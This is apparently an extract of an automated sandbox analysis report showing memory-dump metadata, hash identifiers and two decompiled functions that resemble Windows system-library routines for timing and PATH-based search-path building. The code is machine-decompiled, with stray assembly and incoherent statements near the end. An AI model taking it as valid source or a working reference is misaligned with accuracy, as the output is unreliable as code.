                        0x02bf4a02
                        0x00000000
                        0x02bf4a02
                        0x02bf4972
                        0x02bf4974
                        0x00000000
                        0x00000000
                        0x02bf4976
                        0x02bf4979
                        0x02bf4982
                        0x02bf4983
                        0x02bf4984
                        0x02bf498b
                        0x02bf498d
                        0x02bf4991
                        0x02bf4993
                        0x02bf4999
                        0x02bf499d
                        0x02bf49a2
                        0x02bf49a2
                        0x02bf49a2
                        0x02bf4999
                        0x02bf49ac
                        0x00000000
                        0x02bf49b3
                        0x02bf48f8
                        0x02bf48fe
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bf48fe
                        0x02bf4895
                        0x02bf489c
                        0x02bf48ad
                        0x02bf48b2
                        0x02bf48b5
                        0x02bf48b7
                        0x02bf48ba
                        0x02bf48bc
                        0x02bf48c6
                        0x02bf48c6
                        0x02bf48cb
                        0x02bf48d1
                        0x02bf48d4
                        0x02bf48d8
                        0x02bf48d8
                        0x00000000
                        0x02bf48d8
                        0x02bf48be
                        0x02bf48c0
                        0x00000000
                        0x00000000
                        0x02bf48c2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bf48c4
                        0x00000000
                        0x02bf4882
                        0x02bf487b
                        0x02bf4904
                        0x02bf4906
                        0x00000000
                        0x00000000
                        0x02bf4908
                        0x02bf490e
                        0x00000000
                        0x00000000
                        0x02bf4910
                        0x02bf4917
                        0x02bf4917
                        0x00000000
                        0x02bf4917
                        0x02b9b1ba
                        0x02bf47f9
                        0x02bf47fc
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bf47fc
                        0x02b9b1c0
                        0x02b9b1c0
                        0x02b9b1c3
                        0x02b9b1cb
                        0x00000000
                        0x00000000
                        0x00000000

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: _vswprintf_s
                        • String ID:
                        • API String ID: 677850445-0
                        • Opcode ID: ff67d81cda76860a2c6aad26f041d9d09f4d9bca00b7ba9033e14a85d69a1093
                        • Instruction ID: 1d8478ff464035d6f68d15248ded68f8ad447ba9195b85e2f771befcb6090704
                        • Opcode Fuzzy Hash: ff67d81cda76860a2c6aad26f041d9d09f4d9bca00b7ba9033e14a85d69a1093
                        • Instruction Fuzzy Hash: 3351CC71E002A98FDF61CF688844BAEBBB1FF00714F1081EDDB59AB281D77059898F90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E02BBB944(signed int* __ecx, char __edx) {
                        				signed int _v8;
                        				signed int _v16;
                        				signed int _v20;
                        				char _v28;
                        				signed int _v32;
                        				char _v36;
                        				signed int _v40;
                        				intOrPtr _v44;
                        				signed int* _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				intOrPtr _v60;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				intOrPtr _v72;
                        				intOrPtr _v76;
                        				char _v77;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t65;
                        				intOrPtr _t67;
                        				intOrPtr _t68;
                        				char* _t73;
                        				intOrPtr _t77;
                        				intOrPtr _t78;
                        				signed int _t82;
                        				intOrPtr _t83;
                        				void* _t87;
                        				char _t88;
                        				intOrPtr* _t89;
                        				intOrPtr _t91;
                        				void* _t97;
                        				intOrPtr _t100;
                        				void* _t102;
                        				void* _t107;
                        				signed int _t108;
                        				intOrPtr* _t112;
                        				void* _t113;
                        				intOrPtr* _t114;
                        				intOrPtr _t115;
                        				intOrPtr _t116;
                        				intOrPtr _t117;
                        				signed int _t118;
                        				void* _t130;
                        
                        				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                        				_v8 =  *0x2c8d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                        				_t112 = __ecx;
                        				_v77 = __edx;
                        				_v48 = __ecx;
                        				_v28 = 0;
                        				_t5 = _t112 + 0xc; // 0x575651ff
                        				_t105 =  *_t5;
                        				_v20 = 0;
                        				_v16 = 0;
                        				if(_t105 == 0) {
                        					_t50 = _t112 + 4; // 0x5de58b5b
                        					_t60 =  *__ecx |  *_t50;
                        					if(( *__ecx |  *_t50) != 0) {
                        						 *__ecx = 0;
                        						__ecx[1] = 0;
                        						if(E02BB7D50() != 0) {
                        							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        						} else {
                        							_t65 = 0x7ffe0386;
                        						}
                        						if( *_t65 != 0) {
                        							E02C68CD6(_t112);
                        						}
                        						_push(0);
                        						_t52 = _t112 + 0x10; // 0x778df98b
                        						_push( *_t52);
                        						_t60 = E02BD9E20();
                        					}
                        					L20:
                        					_pop(_t107);
                        					_pop(_t113);
                        					_pop(_t87);
                        					return E02BDB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                        				}
                        				_t8 = _t112 + 8; // 0x8b000cc2
                        				_t67 =  *_t8;
                        				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                        				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                        				_t108 =  *(_t67 + 0x14);
                        				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                        				_t105 = 0x2710;
                        				asm("sbb eax, edi");
                        				_v44 = _t88;
                        				_v52 = _t108;
                        				_t60 = E02BDCE00(_t97, _t68, 0x2710, 0);
                        				_v56 = _t60;
                        				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                        					L3:
                        					 *(_t112 + 0x44) = _t60;
                        					_t105 = _t60 * 0x2710 >> 0x20;
                        					 *_t112 = _t88;
                        					 *(_t112 + 4) = _t108;
                        					_v20 = _t60 * 0x2710;
                        					_v16 = _t60 * 0x2710 >> 0x20;
                        					if(_v77 != 0) {
                        						L16:
                        						_v36 = _t88;
                        						_v32 = _t108;
                        						if(E02BB7D50() != 0) {
                        							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        						} else {
                        							_t73 = 0x7ffe0386;
                        						}
                        						if( *_t73 != 0) {
                        							_t105 = _v40;
                        							E02C68F6A(_t112, _v40, _t88, _t108);
                        						}
                        						_push( &_v28);
                        						_push(0);
                        						_push( &_v36);
                        						_t48 = _t112 + 0x10; // 0x778df98b
                        						_push( *_t48);
                        						_t60 = E02BDAF60();
                        						goto L20;
                        					} else {
                        						_t89 = 0x7ffe03b0;
                        						do {
                        							_t114 = 0x7ffe0010;
                        							do {
                        								_t77 =  *0x2c88628; // 0x0
                        								_v68 = _t77;
                        								_t78 =  *0x2c8862c; // 0x0
                        								_v64 = _t78;
                        								_v72 =  *_t89;
                        								_v76 =  *((intOrPtr*)(_t89 + 4));
                        								while(1) {
                        									_t105 =  *0x7ffe000c;
                        									_t100 =  *0x7ffe0008;
                        									if(_t105 ==  *_t114) {
                        										goto L8;
                        									}
                        									asm("pause");
                        								}
                        								L8:
                        								_t89 = 0x7ffe03b0;
                        								_t115 =  *0x7ffe03b0;
                        								_t82 =  *0x7FFE03B4;
                        								_v60 = _t115;
                        								_t114 = 0x7ffe0010;
                        								_v56 = _t82;
                        							} while (_v72 != _t115 || _v76 != _t82);
                        							_t83 =  *0x2c88628; // 0x0
                        							_t116 =  *0x2c8862c; // 0x0
                        							_v76 = _t116;
                        							_t117 = _v68;
                        						} while (_t117 != _t83 || _v64 != _v76);
                        						asm("sbb edx, [esp+0x24]");
                        						_t102 = _t100 - _v60 - _t117;
                        						_t112 = _v48;
                        						_t91 = _v44;
                        						asm("sbb edx, eax");
                        						_t130 = _t105 - _v52;
                        						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                        							_t88 = _t102 - _t91;
                        							asm("sbb edx, edi");
                        							_t108 = _t105;
                        						} else {
                        							_t88 = 0;
                        							_t108 = 0;
                        						}
                        						goto L16;
                        					}
                        				} else {
                        					if( *(_t112 + 0x44) == _t60) {
                        						goto L20;
                        					}
                        					goto L3;
                        				}
                        			}
















































                        0x02bbb94c
                        0x02bbb956
                        0x02bbb95c
                        0x02bbb95e
                        0x02bbb964
                        0x02bbb969
                        0x02bbb96d
                        0x02bbb96d
                        0x02bbb970
                        0x02bbb974
                        0x02bbb97a
                        0x02bbbadf
                        0x02bbbadf
                        0x02bbbae2
                        0x02bbbae4
                        0x02bbbae6
                        0x02bbbaf0
                        0x02c02cb8
                        0x02bbbaf6
                        0x02bbbaf6
                        0x02bbbaf6
                        0x02bbbafd
                        0x02bbbb1f
                        0x02bbbb1f
                        0x02bbbaff
                        0x02bbbb00
                        0x02bbbb00
                        0x02bbbb03
                        0x02bbbb03
                        0x02bbbacb
                        0x02bbbacf
                        0x02bbbad0
                        0x02bbbad1
                        0x02bbbadc
                        0x02bbbadc
                        0x02bbb980
                        0x02bbb980
                        0x02bbb988
                        0x02bbb98b
                        0x02bbb98d
                        0x02bbb990
                        0x02bbb993
                        0x02bbb999
                        0x02bbb99b
                        0x02bbb9a1
                        0x02bbb9a5
                        0x02bbb9aa
                        0x02bbb9b0
                        0x02bbb9bb
                        0x02bbb9c0
                        0x02bbb9c3
                        0x02bbb9ca
                        0x02bbb9cc
                        0x02bbb9cf
                        0x02bbb9d3
                        0x02bbb9d7
                        0x02bbba94
                        0x02bbba94
                        0x02bbba98
                        0x02bbbaa3
                        0x02c02ccb
                        0x02bbbaa9
                        0x02bbbaa9
                        0x02bbbaa9
                        0x02bbbab1
                        0x02c02cd5
                        0x02c02cdd
                        0x02c02cdd
                        0x02bbbabb
                        0x02bbbabc
                        0x02bbbac2
                        0x02bbbac3
                        0x02bbbac3
                        0x02bbbac6
                        0x00000000
                        0x02bbb9dd
                        0x02bbb9dd
                        0x02bbb9e7
                        0x02bbb9e7
                        0x02bbb9ec
                        0x02bbb9ec
                        0x02bbb9f1
                        0x02bbb9f5
                        0x02bbb9fa
                        0x02bbba00
                        0x02bbba0c
                        0x02bbba10
                        0x02bbba10
                        0x02bbba12
                        0x02bbba18
                        0x00000000
                        0x00000000
                        0x02bbbb26
                        0x02bbbb26
                        0x02bbba1e
                        0x02bbba1e
                        0x02bbba23
                        0x02bbba25
                        0x02bbba2c
                        0x02bbba30
                        0x02bbba35
                        0x02bbba35
                        0x02bbba41
                        0x02bbba46
                        0x02bbba4c
                        0x02bbba50
                        0x02bbba54
                        0x02bbba6a
                        0x02bbba6e
                        0x02bbba70
                        0x02bbba74
                        0x02bbba78
                        0x02bbba7a
                        0x02bbba7c
                        0x02bbba8e
                        0x02bbba90
                        0x02bbba92
                        0x02bbbb14
                        0x02bbbb14
                        0x02bbbb16
                        0x02bbbb16
                        0x00000000
                        0x02bbba7c
                        0x02bbbb0a
                        0x02bbbb0d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bbbb0f

                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02BBB9A5
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 885266447-0
                        • Opcode ID: 81a5f0326a5962bd9355a6d9bb0dfe40d50c651fd2a627f158da411ffa043ec4
                        • Instruction ID: 8ea6f94e3b31087a3da629f0bc5009219acab75288a239dbd721e55d266b7a86
                        • Opcode Fuzzy Hash: 81a5f0326a5962bd9355a6d9bb0dfe40d50c651fd2a627f158da411ffa043ec4
                        • Instruction Fuzzy Hash: 57515E71A04700CFC721CF29C4C0A6ABBE5FF89718F5449AEE99597354DBB0E844CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 83%
                        			E02BC2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                        				signed int _v8;
                        				signed int _v16;
                        				unsigned int _v24;
                        				void* _v28;
                        				signed int _v32;
                        				unsigned int _v36;
                        				signed int _v37;
                        				signed int _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				intOrPtr _v60;
                        				signed int _v64;
                        				signed int _v68;
                        				signed int _v72;
                        				signed int _v76;
                        				signed int _v80;
                        				signed int _t235;
                        				signed int _t239;
                        				void* _t241;
                        				signed int _t244;
                        				signed int _t246;
                        				intOrPtr _t248;
                        				signed int _t251;
                        				signed int _t258;
                        				signed int _t261;
                        				signed int _t269;
                        				signed int _t275;
                        				signed int _t277;
                        				void* _t280;
                        				void* _t282;
                        				signed int _t283;
                        				unsigned int _t286;
                        				signed int _t290;
                        				signed int _t294;
                        				signed int _t298;
                        				intOrPtr _t311;
                        				signed int _t320;
                        				signed int _t322;
                        				signed int _t323;
                        				signed int _t327;
                        				signed int _t328;
                        				signed int _t330;
                        				signed int _t332;
                        				signed int _t334;
                        				void* _t335;
                        				void* _t342;
                        
                        				_t332 = _t334;
                        				_t335 = _t334 - 0x4c;
                        				_v8 =  *0x2c8d360 ^ _t332;
                        				_push(__ebx);
                        				_push(__esi);
                        				_push(__edi);
                        				_t327 = 0x2c8b2e8;
                        				_v56 = _a4;
                        				_v48 = __edx;
                        				_v60 = __ecx;
                        				_t286 = 0;
                        				_v80 = 0;
                        				asm("movsd");
                        				_v64 = 0;
                        				_v76 = 0;
                        				_v72 = 0;
                        				asm("movsd");
                        				_v44 = 0;
                        				_v52 = 0;
                        				_v68 = 0;
                        				asm("movsd");
                        				_v32 = 0;
                        				_v36 = 0;
                        				asm("movsd");
                        				_v16 = 0;
                        				_t275 = 0x48;
                        				_t308 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                        				_t320 = 0;
                        				_v37 = _t308;
                        				if(_v48 <= 0) {
                        					L16:
                        					_t45 = _t275 - 0x48; // 0x0
                        					__eflags = _t45 - 0xfffe;
                        					if(_t45 > 0xfffe) {
                        						_t328 = 0xc0000106;
                        						goto L32;
                        					} else {
                        						_t327 = L02BB4620(_t286,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                        						_v52 = _t327;
                        						__eflags = _t327;
                        						if(_t327 == 0) {
                        							_t328 = 0xc0000017;
                        							goto L32;
                        						} else {
                        							 *(_t327 + 0x44) =  *(_t327 + 0x44) & 0x00000000;
                        							_t50 = _t327 + 0x48; // 0x48
                        							_t322 = _t50;
                        							_t308 = _v32;
                        							 *(_t327 + 0x3c) = _t275;
                        							_t277 = 0;
                        							 *((short*)(_t327 + 0x30)) = _v48;
                        							__eflags = _t308;
                        							if(_t308 != 0) {
                        								 *(_t327 + 0x18) = _t322;
                        								__eflags = _t308 - 0x2c88478;
                        								 *_t327 = ((0 | _t308 == 0x02c88478) - 0x00000001 & 0xfffffffb) + 7;
                        								E02BDF3E0(_t322,  *((intOrPtr*)(_t308 + 4)),  *_t308 & 0x0000ffff);
                        								_t308 = _v32;
                        								_t335 = _t335 + 0xc;
                        								_t277 = 1;
                        								__eflags = _a8;
                        								_t322 = _t322 + (( *_t308 & 0x0000ffff) >> 1) * 2;
                        								if(_a8 != 0) {
                        									_t269 = E02C239F2(_t322);
                        									_t308 = _v32;
                        									_t322 = _t269;
                        								}
                        							}
                        							_t290 = 0;
                        							_v16 = 0;
                        							__eflags = _v48;
                        							if(_v48 <= 0) {
                        								L31:
                        								_t328 = _v68;
                        								__eflags = 0;
                        								 *((short*)(_t322 - 2)) = 0;
                        								goto L32;
                        							} else {
                        								_t275 = _t327 + _t277 * 4;
                        								_v56 = _t275;
                        								do {
                        									__eflags = _t308;
                        									if(_t308 != 0) {
                        										_t235 =  *(_v60 + _t290 * 4);
                        										__eflags = _t235;
                        										if(_t235 == 0) {
                        											goto L30;
                        										} else {
                        											__eflags = _t235 == 5;
                        											if(_t235 == 5) {
                        												goto L30;
                        											} else {
                        												goto L22;
                        											}
                        										}
                        									} else {
                        										L22:
                        										 *_t275 =  *(_v60 + _t290 * 4);
                        										 *(_t275 + 0x18) = _t322;
                        										_t239 =  *(_v60 + _t290 * 4);
                        										__eflags = _t239 - 8;
                        										if(_t239 > 8) {
                        											goto L56;
                        										} else {
                        											switch( *((intOrPtr*)(_t239 * 4 +  &M02BC2959))) {
                        												case 0:
                        													__ax =  *0x2c88488;
                        													__eflags = __ax;
                        													if(__ax == 0) {
                        														goto L29;
                        													} else {
                        														__ax & 0x0000ffff = E02BDF3E0(__edi,  *0x2c8848c, __ax & 0x0000ffff);
                        														__eax =  *0x2c88488 & 0x0000ffff;
                        														goto L26;
                        													}
                        													goto L108;
                        												case 1:
                        													L45:
                        													E02BDF3E0(_t322, _v80, _v64);
                        													_t264 = _v64;
                        													goto L26;
                        												case 2:
                        													 *0x2c88480 & 0x0000ffff = E02BDF3E0(__edi,  *0x2c88484,  *0x2c88480 & 0x0000ffff);
                        													__eax =  *0x2c88480 & 0x0000ffff;
                        													__eax = ( *0x2c88480 & 0x0000ffff) >> 1;
                        													__edi = __edi + __eax * 2;
                        													goto L28;
                        												case 3:
                        													__eax = _v44;
                        													__eflags = __eax;
                        													if(__eax == 0) {
                        														goto L29;
                        													} else {
                        														__esi = __eax + __eax;
                        														__eax = E02BDF3E0(__edi, _v72, __esi);
                        														__edi = __edi + __esi;
                        														__esi = _v52;
                        														goto L27;
                        													}
                        													goto L108;
                        												case 4:
                        													_push(0x2e);
                        													_pop(__eax);
                        													 *(__esi + 0x44) = __edi;
                        													 *__edi = __ax;
                        													__edi = __edi + 4;
                        													_push(0x3b);
                        													_pop(__eax);
                        													 *(__edi - 2) = __ax;
                        													goto L29;
                        												case 5:
                        													__eflags = _v36;
                        													if(_v36 == 0) {
                        														goto L45;
                        													} else {
                        														E02BDF3E0(_t322, _v76, _v36);
                        														_t264 = _v36;
                        													}
                        													L26:
                        													_t335 = _t335 + 0xc;
                        													_t322 = _t322 + (_t264 >> 1) * 2 + 2;
                        													__eflags = _t322;
                        													L27:
                        													_push(0x3b);
                        													_pop(_t266);
                        													 *((short*)(_t322 - 2)) = _t266;
                        													goto L28;
                        												case 6:
                        													__ebx =  *0x2c8575c;
                        													__eflags = __ebx - 0x2c8575c;
                        													if(__ebx != 0x2c8575c) {
                        														_push(0x3b);
                        														_pop(__esi);
                        														do {
                        															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                        															E02BDF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                        															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                        															__edi = __edi + __eax * 2;
                        															__edi = __edi + 2;
                        															 *(__edi - 2) = __si;
                        															__ebx =  *__ebx;
                        															__eflags = __ebx - 0x2c8575c;
                        														} while (__ebx != 0x2c8575c);
                        														__esi = _v52;
                        														__ecx = _v16;
                        														__edx = _v32;
                        													}
                        													__ebx = _v56;
                        													goto L29;
                        												case 7:
                        													 *0x2c88478 & 0x0000ffff = E02BDF3E0(__edi,  *0x2c8847c,  *0x2c88478 & 0x0000ffff);
                        													__eax =  *0x2c88478 & 0x0000ffff;
                        													__eax = ( *0x2c88478 & 0x0000ffff) >> 1;
                        													__eflags = _a8;
                        													__edi = __edi + __eax * 2;
                        													if(_a8 != 0) {
                        														__ecx = __edi;
                        														__eax = E02C239F2(__ecx);
                        														__edi = __eax;
                        													}
                        													goto L28;
                        												case 8:
                        													__eax = 0;
                        													 *(__edi - 2) = __ax;
                        													 *0x2c86e58 & 0x0000ffff = E02BDF3E0(__edi,  *0x2c86e5c,  *0x2c86e58 & 0x0000ffff);
                        													 *(__esi + 0x38) = __edi;
                        													__eax =  *0x2c86e58 & 0x0000ffff;
                        													__eax = ( *0x2c86e58 & 0x0000ffff) >> 1;
                        													__edi = __edi + __eax * 2;
                        													__edi = __edi + 2;
                        													L28:
                        													_t290 = _v16;
                        													_t308 = _v32;
                        													L29:
                        													_t275 = _t275 + 4;
                        													__eflags = _t275;
                        													_v56 = _t275;
                        													goto L30;
                        											}
                        										}
                        									}
                        									goto L108;
                        									L30:
                        									_t290 = _t290 + 1;
                        									_v16 = _t290;
                        									__eflags = _t290 - _v48;
                        								} while (_t290 < _v48);
                        								goto L31;
                        							}
                        						}
                        					}
                        				} else {
                        					while(1) {
                        						L1:
                        						_t239 =  *(_v60 + _t320 * 4);
                        						if(_t239 > 8) {
                        							break;
                        						}
                        						switch( *((intOrPtr*)(_t239 * 4 +  &M02BC2935))) {
                        							case 0:
                        								__ax =  *0x2c88488;
                        								__eflags = __ax;
                        								if(__ax != 0) {
                        									__eax = __ax & 0x0000ffff;
                        									__ebx = __ebx + 2;
                        									__eflags = __ebx;
                        									goto L53;
                        								}
                        								goto L14;
                        							case 1:
                        								L44:
                        								_t308 =  &_v64;
                        								_v80 = E02BC2E3E(0,  &_v64);
                        								_t275 = _t275 + _v64 + 2;
                        								goto L13;
                        							case 2:
                        								__eax =  *0x2c88480 & 0x0000ffff;
                        								__ebx = __ebx + __eax;
                        								__eflags = __dl;
                        								if(__dl != 0) {
                        									__eax = 0x2c88480;
                        									goto L80;
                        								}
                        								goto L14;
                        							case 3:
                        								__eax = E02BAEEF0(0x2c879a0);
                        								__eax =  &_v44;
                        								_push(__eax);
                        								_push(0);
                        								_push(0);
                        								_push(4);
                        								_push(L"PATH");
                        								_push(0);
                        								L57();
                        								__esi = __eax;
                        								_v68 = __esi;
                        								__eflags = __esi - 0xc0000023;
                        								if(__esi != 0xc0000023) {
                        									L10:
                        									__eax = E02BAEB70(__ecx, 0x2c879a0);
                        									__eflags = __esi - 0xc0000100;
                        									if(__esi == 0xc0000100) {
                        										_v44 = _v44 & 0x00000000;
                        										__eax = 0;
                        										_v68 = 0;
                        										goto L13;
                        									} else {
                        										__eflags = __esi;
                        										if(__esi < 0) {
                        											L32:
                        											_t213 = _v72;
                        											__eflags = _t213;
                        											if(_t213 != 0) {
                        												L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
                        											}
                        											_t214 = _v52;
                        											__eflags = _t214;
                        											if(_t214 != 0) {
                        												__eflags = _t328;
                        												if(_t328 < 0) {
                        													L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
                        													_t214 = 0;
                        												}
                        											}
                        											goto L36;
                        										} else {
                        											__eax = _v44;
                        											__ebx = __ebx + __eax * 2;
                        											__ebx = __ebx + 2;
                        											__eflags = __ebx;
                        											L13:
                        											_t286 = _v36;
                        											goto L14;
                        										}
                        									}
                        								} else {
                        									__eax = _v44;
                        									__ecx =  *0x2c87b9c; // 0x0
                        									_v44 + _v44 =  *[fs:0x30];
                        									__ecx = __ecx + 0x180000;
                        									__eax = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                        									_v72 = __eax;
                        									__eflags = __eax;
                        									if(__eax == 0) {
                        										__eax = E02BAEB70(__ecx, 0x2c879a0);
                        										__eax = _v52;
                        										L36:
                        										_pop(_t321);
                        										_pop(_t329);
                        										__eflags = _v8 ^ _t332;
                        										_pop(_t276);
                        										return E02BDB640(_t214, _t276, _v8 ^ _t332, _t308, _t321, _t329);
                        									} else {
                        										__ecx =  &_v44;
                        										_push(__ecx);
                        										_push(_v44);
                        										_push(__eax);
                        										_push(4);
                        										_push(L"PATH");
                        										_push(0);
                        										L57();
                        										__esi = __eax;
                        										_v68 = __eax;
                        										goto L10;
                        									}
                        								}
                        								goto L108;
                        							case 4:
                        								__ebx = __ebx + 4;
                        								goto L14;
                        							case 5:
                        								_t271 = _v56;
                        								if(_v56 != 0) {
                        									_t308 =  &_v36;
                        									_t273 = E02BC2E3E(_t271,  &_v36);
                        									_t286 = _v36;
                        									_v76 = _t273;
                        								}
                        								if(_t286 == 0) {
                        									goto L44;
                        								} else {
                        									_t275 = _t275 + 2 + _t286;
                        								}
                        								goto L14;
                        							case 6:
                        								__eax =  *0x2c85764 & 0x0000ffff;
                        								goto L53;
                        							case 7:
                        								__eax =  *0x2c88478 & 0x0000ffff;
                        								__ebx = __ebx + __eax;
                        								__eflags = _a8;
                        								if(_a8 != 0) {
                        									__ebx = __ebx + 0x16;
                        									__ebx = __ebx + __eax;
                        								}
                        								__eflags = __dl;
                        								if(__dl != 0) {
                        									__eax = 0x2c88478;
                        									L80:
                        									_v32 = __eax;
                        								}
                        								goto L14;
                        							case 8:
                        								__eax =  *0x2c86e58 & 0x0000ffff;
                        								__eax = ( *0x2c86e58 & 0x0000ffff) + 2;
                        								L53:
                        								__ebx = __ebx + __eax;
                        								L14:
                        								_t320 = _t320 + 1;
                        								if(_t320 >= _v48) {
                        									goto L16;
                        								} else {
                        									_t308 = _v37;
                        									goto L1;
                        								}
                        								goto L108;
                        						}
                        					}
                        					L56:
                        					asm("int 0x29");
                        					asm("out 0x28, al");
                        					asm("daa");
                        					_t241 = _t239 + _t239 +  *((intOrPtr*)(_t327 + 0x28));
                        					_t280 = 0x25;
                        					asm("rol byte [edx], 0x94");
                        					 *((intOrPtr*)(_t308 + _t241 + 0x2c05b35)) =  *((intOrPtr*)(_t308 + _t241 + 0x2c05b35)) - _t280;
                        					asm("daa");
                        					_t342 = 0xbc275d02;
                        					_pop(_t282);
                        					asm("rol byte [edx], 0xb4");
                        					 *((intOrPtr*)(_t308 + _t308 + _t241 + 0x2c05c34)) =  *((intOrPtr*)(_t308 + _t308 + _t241 + 0x2c05c34)) - _t282;
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					_push(0x20);
                        					_push(0x2c6ff00);
                        					E02BED08C(_t282, _t322, _t327);
                        					_v44 =  *[fs:0x18];
                        					_t323 = 0;
                        					 *_a24 = 0;
                        					_t283 = _a12;
                        					__eflags = _t283;
                        					if(_t283 == 0) {
                        						_t244 = 0xc0000100;
                        					} else {
                        						_v8 = 0;
                        						_t330 = 0xc0000100;
                        						_v52 = 0xc0000100;
                        						_t246 = 4;
                        						while(1) {
                        							_v40 = _t246;
                        							__eflags = _t246;
                        							if(_t246 == 0) {
                        								break;
                        							}
                        							_t298 = _t246 * 0xc;
                        							_v48 = _t298;
                        							__eflags = _t283 -  *((intOrPtr*)(_t298 + 0x2b71664));
                        							if(__eflags <= 0) {
                        								if(__eflags == 0) {
                        									_t261 = E02BDE5C0(_a8,  *((intOrPtr*)(_t298 + 0x2b71668)), _t283);
                        									_t342 = _t342 + 0xc;
                        									__eflags = _t261;
                        									if(__eflags == 0) {
                        										_t330 = E02C151BE(_t283,  *((intOrPtr*)(_v48 + 0x2b7166c)), _a16, _t323, _t330, __eflags, _a20, _a24);
                        										_v52 = _t330;
                        										break;
                        									} else {
                        										_t246 = _v40;
                        										goto L62;
                        									}
                        									goto L70;
                        								} else {
                        									L62:
                        									_t246 = _t246 - 1;
                        									continue;
                        								}
                        							}
                        							break;
                        						}
                        						_v32 = _t330;
                        						__eflags = _t330;
                        						if(_t330 < 0) {
                        							__eflags = _t330 - 0xc0000100;
                        							if(_t330 == 0xc0000100) {
                        								_t294 = _a4;
                        								__eflags = _t294;
                        								if(_t294 != 0) {
                        									_v36 = _t294;
                        									__eflags =  *_t294 - _t323;
                        									if( *_t294 == _t323) {
                        										_t330 = 0xc0000100;
                        										goto L76;
                        									} else {
                        										_t311 =  *((intOrPtr*)(_v44 + 0x30));
                        										_t248 =  *((intOrPtr*)(_t311 + 0x10));
                        										__eflags =  *((intOrPtr*)(_t248 + 0x48)) - _t294;
                        										if( *((intOrPtr*)(_t248 + 0x48)) == _t294) {
                        											__eflags =  *(_t311 + 0x1c);
                        											if( *(_t311 + 0x1c) == 0) {
                        												L106:
                        												_t330 = E02BC2AE4( &_v36, _a8, _t283, _a16, _a20, _a24);
                        												_v32 = _t330;
                        												__eflags = _t330 - 0xc0000100;
                        												if(_t330 != 0xc0000100) {
                        													goto L69;
                        												} else {
                        													_t323 = 1;
                        													_t294 = _v36;
                        													goto L75;
                        												}
                        											} else {
                        												_t251 = E02BA6600( *(_t311 + 0x1c));
                        												__eflags = _t251;
                        												if(_t251 != 0) {
                        													goto L106;
                        												} else {
                        													_t294 = _a4;
                        													goto L75;
                        												}
                        											}
                        										} else {
                        											L75:
                        											_t330 = E02BC2C50(_t294, _a8, _t283, _a16, _a20, _a24, _t323);
                        											L76:
                        											_v32 = _t330;
                        											goto L69;
                        										}
                        									}
                        									goto L108;
                        								} else {
                        									E02BAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        									_v8 = 1;
                        									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                        									_t330 = _a24;
                        									_t258 = E02BC2AE4( &_v36, _a8, _t283, _a16, _a20, _t330);
                        									_v32 = _t258;
                        									__eflags = _t258 - 0xc0000100;
                        									if(_t258 == 0xc0000100) {
                        										_v32 = E02BC2C50(_v36, _a8, _t283, _a16, _a20, _t330, 1);
                        									}
                        									_v8 = _t323;
                        									E02BC2ACB();
                        								}
                        							}
                        						}
                        						L69:
                        						_v8 = 0xfffffffe;
                        						_t244 = _t330;
                        					}
                        					L70:
                        					return E02BED0D1(_t244);
                        				}
                        				L108:
